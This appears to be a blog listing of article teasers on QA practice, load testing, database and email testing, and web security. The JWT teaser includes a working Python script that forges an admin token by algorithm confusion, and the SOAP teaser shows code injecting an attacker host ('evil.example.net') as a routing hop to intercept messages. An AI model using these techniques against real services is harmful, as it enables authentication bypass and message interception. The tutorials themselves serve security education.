• QA process at Miro

      We have been working on our current QA process for about two years, and we are still improving it. The process may seem obvious, but when we started to implement it in a new team consisting entirely of new developers, we realized that it was difficult to adopt right away. Many people are used to working differently, and switching requires making a lot of changes at once, which is hard. At the same time, it is ill-advised to implement this process piecemeal, because that can negatively affect quality.

      So what do we do? We prepare for each block of the development process: task decomposition, estimation and planning, development itself, exploratory testing, and release. This preparation does not mean simply throwing old parts out of the process; it means replacing them with something better, which raises quality.

      In this article, I will talk in detail about our testing process at each stage of creating a new feature, and about the changes we introduced that have increased the quality and speed of development.

      Read more →
    • Managing hundreds of servers for load testing: autoscaling, custom monitoring, DevOps culture

        In the previous article, I talked about our load testing infrastructure. On average, we use about 100 servers to generate load and about 150 servers to run our service. All these servers need to be created, configured, started, and deleted. To do this, we use the same tools as in the production environment to reduce the amount of manual work:

        • Terraform scripts for creating and deleting the test environment;
        • Ansible scripts for configuring, updating, and starting servers;
        • In-house Python scripts for dynamic scaling depending on the load (see the sketch after the commands below).

        Thanks to the Terraform and Ansible scripts, all operations ranging from creating instances to starting servers are performed with only six commands:

        #launch the required instances in the AWS console
        ansible-playbook deploy-config.yml                          #update server versions
        ansible-playbook start-application.yml                      #start our app on these servers
        ansible-playbook update-test-scenario.yml --ask-vault-pass  #update the JMeter test scenario if it was changed
        terraform apply                                             #create JMeter servers for creating the load
        ansible-playbook start-jmeter-server-cluster.yml            #start the JMeter cluster
        ansible-playbook start-stress-test.yml                      #start the test
        
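        The dynamic-scaling scripts are not shown in the commands above. Here is a minimal sketch of the idea behind such an in-house Python script, assuming boto3, CloudWatch metrics, and an AWS Auto Scaling group; the group name and CPU thresholds are hypothetical:

        import time
        from datetime import datetime, timedelta

        import boto3  # assumption: the load cluster runs in AWS, as in the Terraform setup

        ASG_NAME = "load-generator-asg"   # hypothetical Auto Scaling group
        CPU_HIGH, CPU_LOW = 75.0, 25.0    # hypothetical scale-out/scale-in thresholds

        autoscaling = boto3.client("autoscaling")
        cloudwatch = boto3.client("cloudwatch")

        def average_cpu(asg_name):
            """Average CPU utilization of the group over the last five minutes."""
            now = datetime.utcnow()
            stats = cloudwatch.get_metric_statistics(
                Namespace="AWS/EC2",
                MetricName="CPUUtilization",
                Dimensions=[{"Name": "AutoScalingGroupName", "Value": asg_name}],
                StartTime=now - timedelta(minutes=5),
                EndTime=now,
                Period=300,
                Statistics=["Average"],
            )
            points = stats["Datapoints"]
            return points[0]["Average"] if points else 0.0

        while True:
            group = autoscaling.describe_auto_scaling_groups(
                AutoScalingGroupNames=[ASG_NAME]
            )["AutoScalingGroups"][0]
            desired = group["DesiredCapacity"]
            cpu = average_cpu(ASG_NAME)

            if cpu > CPU_HIGH:
                desired = min(desired + 1, group["MaxSize"])  # scale out, capped at MaxSize
            elif cpu < CPU_LOW:
                desired = max(desired - 1, group["MinSize"])  # scale in, floored at MinSize

            autoscaling.set_desired_capacity(
                AutoScalingGroupName=ASG_NAME, DesiredCapacity=desired
            )
            time.sleep(60)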

        Read more →
      • Reliable load testing with regards to unexpected nuances

          We thought about building the infrastructure for large load tests a year ago when we reached the mark of 12,000 simultaneously active online users. In three months, we made the first version of the test, which showed us the limits of the service.

          The irony is that simultaneously with the launch of the test, we reached the limits on the production server, resulting in a two-hour service outage. This further encouraged us to move from occasional tests to establishing an effective load testing infrastructure. By infrastructure, I mean all the tools for working with load testing: tools for launching the test (manual and automatic), the cluster that creates the load, a production-like cluster, metrics and reporting services, scaling services, and the code to manage it all.

          [image: simplified diagram of our service infrastructure]

          Simplified, this is what our structure looks like: a collection of different servers that somehow interact with each other, each performing specific tasks. It seemed that to build the load testing infrastructure, it was enough for us to make this diagram, take all the interactions into account, and start creating test cases for each block one by one.

          This approach is right, but it would have taken many months, which was not suitable for us because of our rapid growth — over the past twelve months, we have grown from 12,000 to 100,000 simultaneously active online users. Also, we didn’t know how our service infrastructure would respond to the increased load: which blocks would become the bottleneck, and which would scale linearly?
          Read more →
        • Are my open-source libraries vulnerable? (2 min reading to make your life more secure)

            The explosion of open source and issues related to it


            The amount of open-source or other third-party code used in a software project is estimated at 60-90% of a codebase. Components such as libraries, frameworks, and other software modules almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defences and enable a range of possible attacks and impacts.



            Conclusion: even if you perform constant security code reviews, you still might be vulnerable because of third-party components.

            Some have tried to track these vulnerabilities manually, but the sheer amount of work and data keeps growing and is time-consuming, difficult, and error-prone to manage. It would take several full-time employees and skilled security analysts constantly monitoring all sources to stay on top of it.
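            Automated tooling handles this much better. As one illustration (not necessarily the tooling the author has in mind), here is a minimal Python sketch that asks the public OSV.dev vulnerability database about a single pinned dependency; the package and version are arbitrary examples:

            import json
            import urllib.request

            def known_vulnerabilities(name, version, ecosystem="PyPI"):
                """Query the public OSV.dev database for known vulnerabilities."""
                query = json.dumps({
                    "package": {"name": name, "ecosystem": ecosystem},
                    "version": version,
                }).encode()
                req = urllib.request.Request(
                    "https://api.osv.dev/v1/query",
                    data=query,
                    headers={"Content-Type": "application/json"},
                )
                with urllib.request.urlopen(req) as resp:
                    return json.load(resp).get("vulns", [])

            # Example: an old Django release with published advisories.
            for vuln in known_vulnerabilities("django", "3.2"):
                print(vuln["id"], "-", vuln.get("summary", ""))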
            Read more →
          • V&V not for vendetta



              Over the past six years, I have worked on the development and acceptance testing of applications for conducting and supporting clinical trials: applications of various sizes and complexity, big data, a huge number of visualizations and views, data warehousing, ETL, etc. The products are used by doctors, clinical trial management, and people involved in the control and monitoring of research.

              For applications that have, or can have, a direct impact on the life and health of patients, a formal acceptance testing process is required. Acceptance test results, along with the rest of the documentation package, are submitted for audit to the FDA (Food and Drug Administration, USA). The FDA authorizes the use of the application as a tool for monitoring and conducting clinical trials. In total, my team has developed, tested, and shipped to production more than thirty applications. In this article, I will briefly talk about acceptance testing and the improvement of the tools used for it.

              Note: I do not pretend to be the ultimate authority, and I fully understand that most of what I write about is a Captain Obvious monologue. But I hope it can be useful both to entry-level specialists and to teams that encounter this in everyday work, or at least that it will please those who have simpler processes.
              Read more →
            • SOAP Routing Detours Vulnerability

                Description


                The WS-Routing Protocol is a protocol for exchanging SOAP messages from an initial message sender to the ultimate receiver, typically via a set of intermediaries. The WS-Routing protocol is implemented as a SOAP extension and is embedded in the SOAP Header. WS-Routing is often used to provide a way to direct XML traffic through complex environments and transactions by allowing interim way stations in the XML path to assign routing instructions to an XML document.

                Taking a minimalist approach, WS-Routing encapsulates a message path within a SOAP message, so that the message contains enough information to be sent across the Internet using transports like TCP and UDP while supporting:

                • The SOAP message path model,
                • Full-duplex, one-way message patterns,
                • Full-duplex, request-response message patterns, and
                • Message correlation.

                Routing detours are a type of "man in the middle" attack where intermediaries can be injected or "hijacked" to route sensitive messages to an outside location. Routing information (either in the HTTP header or in the WS-Routing header) can be modified en route, and traces of the routing can be removed from the header and message, such that the receiving application is none the wiser that a routing detour has occurred.
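                To make the detour concrete, here is a minimal Python sketch that injects an attacker-controlled intermediary as the first <via> hop of a WS-Routing path header; the endpoint URIs are hypothetical, and the namespace is the one defined by the WS-Routing specification:

                import xml.etree.ElementTree as ET

                WSRP = "http://schemas.xmlsoap.org/rp/"  # WS-Routing namespace
                ET.register_namespace("wsrp", WSRP)

                # A simplified WS-Routing path header as it might appear in a SOAP Header.
                original = """
                <wsrp:path xmlns:wsrp="http://schemas.xmlsoap.org/rp/">
                  <wsrp:action>http://example.com/orders/submit</wsrp:action>
                  <wsrp:to>soap://orders.example.com/endpoint</wsrp:to>
                  <wsrp:fwd>
                    <wsrp:via>soap://gateway.example.com</wsrp:via>
                  </wsrp:fwd>
                </wsrp:path>
                """

                def inject_detour(path_xml, attacker_uri):
                    """Insert an attacker-controlled intermediary as the first <via> hop."""
                    root = ET.fromstring(path_xml)
                    fwd = root.find("{%s}fwd" % WSRP)
                    via = ET.Element("{%s}via" % WSRP)
                    via.text = attacker_uri
                    fwd.insert(0, via)  # the message is now routed through the attacker first
                    return ET.tostring(root, encoding="unicode")

                print(inject_detour(original, "soap://evil.example.net/intercept"))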
                Read more →
              • Testing SQL Server code with tSQLt

                  FYI: this article is an expanded version of my talk at SQA Days #25.

                  Based on my experience and conversations with colleagues, I can state that DB code testing is not a widespread practice. This can be potentially dangerous. DB logic is written by human beings, just like all other "usual" code, so there can be failures that cause negative consequences for a product, business, or users. Whether it is stored procedures supporting a backend or ETL modifying data in a warehouse, there is always a risk, and testing helps to decrease it. I want to tell you what tSQLt is and how it helps us test DB code.

                  Read more →
                • How to Make Emails and Not Mess Up: Practical Tips

                  • Tutorial


                  A developer who first encounters email generation has almost no chance of writing an application that does it correctly. Around 40% of the emails generated by corporate applications violate some standard, and this causes problems with delivery and display. There are reasons for this: email is technically more difficult than the web, operating email is regulated by a few hundred standards and an uncountable number of generally accepted (and not so accepted) practices, and email clients are more varied and unpredictable than browsers. Testing can significantly improve the situation, but materials dedicated to testing email systems are practically non-existent.
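                  As a small taste of what "doing it correctly" involves, here is a minimal sketch using Python's standard library, which already takes care of several things (MIME structure, header encoding, multipart/alternative) that hand-rolled generators often get wrong; the addresses and the SMTP host are placeholders:

                  import smtplib
                  from email.message import EmailMessage

                  # EmailMessage produces standards-compliant headers, MIME boundaries,
                  # and content-transfer encodings that ad-hoc string concatenation gets wrong.
                  msg = EmailMessage()
                  msg["From"] = "Example App <noreply@example.com>"
                  msg["To"] = "user@example.com"
                  msg["Subject"] = "Your weekly report"  # non-ASCII here would be encoded automatically

                  # multipart/alternative: a plain-text part plus an HTML alternative.
                  msg.set_content("Hi!\nYour report is ready: https://example.com/report")
                  msg.add_alternative(
                      "<html><body><p>Hi!<br>Your report is "
                      '<a href="https://example.com/report">ready</a>.</p></body></html>',
                      subtype="html",
                  )

                  with smtplib.SMTP("smtp.example.com") as server:  # placeholder host
                      server.send_message(msg)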

                  Mail.ru regularly interacts with its users by email. In our projects, all the components responsible for generating emails, and even individual mailings, are subject to mandatory testing. In this article, we will share our experience (learning from our mistakes).
                  Read more →
                • Quality as Team's responsibility. Our QA experience

                  Disclaimer: this is a translation of an article. All rights belong to the author of the original article and to Miro.


                  I'm a QA Engineer at Miro. Let me tell you about our experiment of partially transferring testing tasks to developers and transforming the Test Engineer role into a QA (Quality Assurance) role.


                  First, briefly about our development process. We have daily releases of the client side and three to five releases of the server side per week. The team consists of 60+ people split into 10 functional Scrum teams.


                  I work in the Integration team. Our tasks are:


                  • Integration of our service into external products
                  • Integration of external products into our service
                    For example, we have integrated with Jira. Jira Cards are a visual representation of tasks, so it's convenient to work with tasks without opening Jira at all.


                  How the experiment started


                  It all started with a trivial issue: when one of the Test Engineers was on sick leave, team performance degraded significantly. The team continued working on tasks, but when code reached the testing phase, the tasks were put on hold. As a result, new functionality didn't reach production in time.


                  A Test Engineer going on vacation is an even more complex story: they need to find another Test Engineer who is ready to take on extra tasks, and then share the necessary knowledge with them. Two Test Engineers going on vacation at the same time is a luxury we cannot afford.

                  Read more →
                • Hack the JWT Token

                  • Tutorial

                  For educational purposes only! Intended for hackers and penetration testers.

                  Issue


                  The HS256 algorithm uses a shared secret key to sign and verify each message. The RS256 algorithm uses a private key to sign the message and a public key to verify it.

                  If you change the algorithm from RS256 to HS256, the backend code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature. Asymmetric Cipher Algorithm => Symmetric Cipher Algorithm.

                  Because the public key can sometimes be obtained by the attacker, the attacker can modify the algorithm in the header to HS256 and then use the RSA public key to sign the data.
                  The backend code uses the RSA public key + HS256 algorithm for signature verification.

                  Example


                  The vulnerability appears when server-side validation looks like this:

                  const decoded = jwt.verify(
                     token,
                     publicRSAKey,
                     { algorithms: ['HS256', 'RS256'] }  // accepts both algorithms
                  )

                  Let's assume we have an initial token like the one presented below, where " => " shows the modification an attacker can make:

                  //header 
                  {
                  alg: 'RS256'                         =>  'HS256'
                  }
                  //payload
                  {
                  sub: '123',
                  name: 'Oleh Khomiak',
                  admin: 'false'                       => 'true'
                  }

                  The backend code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature.
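                  A minimal sketch of the forgery in Python, assuming the attacker has already obtained the server's RSA public key in PEM form (the file name and claims are hypothetical). It re-signs the modified header and payload with HMAC-SHA256, using the PEM bytes themselves as the secret, which is exactly what the vulnerable backend will use during verification:

                  import base64
                  import hashlib
                  import hmac
                  import json

                  def b64url(data):
                      """Base64url-encode without padding, as the JWT spec requires."""
                      return base64.urlsafe_b64encode(data).rstrip(b"=")

                  # Attacker-controlled header and payload: algorithm switched to HS256,
                  # privileges escalated.
                  header = {"alg": "HS256", "typ": "JWT"}
                  payload = {"sub": "123", "name": "Oleh Khomiak", "admin": "true"}

                  signing_input = (
                      b64url(json.dumps(header, separators=(",", ":")).encode())
                      + b"."
                      + b64url(json.dumps(payload, separators=(",", ":")).encode())
                  )

                  # The server's RSA *public* key (the exact PEM bytes, including any
                  # trailing newline) serves as the HMAC secret.
                  public_key_pem = open("server_public_key.pem", "rb").read()  # hypothetical file
                  signature = hmac.new(public_key_pem, signing_input, hashlib.sha256).digest()

                  forged_token = signing_input + b"." + b64url(signature)
                  print(forged_token.decode())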
                  Read more →
                • The most common OAuth 2.0 Hacks

                    OAuth 2 overview


                    This article assumes that readers are familiar with OAuth 2. However, a brief description of it is presented below.



                    1. The application requests authorization to access service resources from the user. The application needs to provide the client ID, client secret, redirect URI, and the required scopes.
                    2. If the user authorizes the request, the application receives an authorization grant.
                    3. The application requests an access token from the authorization server by presenting authentication of its own identity and the authorization grant (this step is sketched in code after the list).
                    4. If the application identity is authenticated and the authorization grant is valid, the authorization server issues an access token (and a refresh token, if required) to the application. Authorization is complete.
                    5. The application requests the resource from the resource server and presents the access token for authentication.
                    6. If the access token is valid, the resource server serves the resource to the application.
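                    A minimal sketch of step 3, the code-for-token exchange, using Python's requests library; the endpoint URLs, client credentials, and redirect URI are all placeholders:

                    import requests

                    # Exchange the authorization code for tokens (all values are placeholders).
                    resp = requests.post(
                        "https://auth.example.com/oauth/token",
                        data={
                            "grant_type": "authorization_code",
                            "code": "AUTH_CODE_RECEIVED_ON_REDIRECT",
                            "redirect_uri": "https://app.example.com/callback",
                            "client_id": "my-client-id",
                            "client_secret": "my-client-secret",
                        },
                        timeout=10,
                    )
                    resp.raise_for_status()

                    tokens = resp.json()
                    access_token = tokens["access_token"]
                    refresh_token = tokens.get("refresh_token")  # present only if the server issued one

                    # The access token is then presented to the resource server (steps 5 and 6).
                    api = requests.get(
                        "https://api.example.com/v1/me",
                        headers={"Authorization": "Bearer " + access_token},
                        timeout=10,
                    )
                    print(api.json())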

                    There are some notable pros and cons to OAuth 2.0. The pros:


                    • OAuth 2.0 is easier to use and implement (compared to OAuth 1.0)
                    • Widespread and continuing to grow
                    • Short-lived tokens
                    • Encapsulated tokens

                    And the cons:

                    — No signature (relies solely on SSL/TLS); Bearer tokens
                    — No built-in security
                    — Can be dangerous when used by inexperienced people
                    — Too many compromises; the working group did not make clear decisions
                    — Mobile integration (web views)
                    — The OAuth 2.0 spec is not a protocol but rather a framework (RFC 6749)

                    Read more →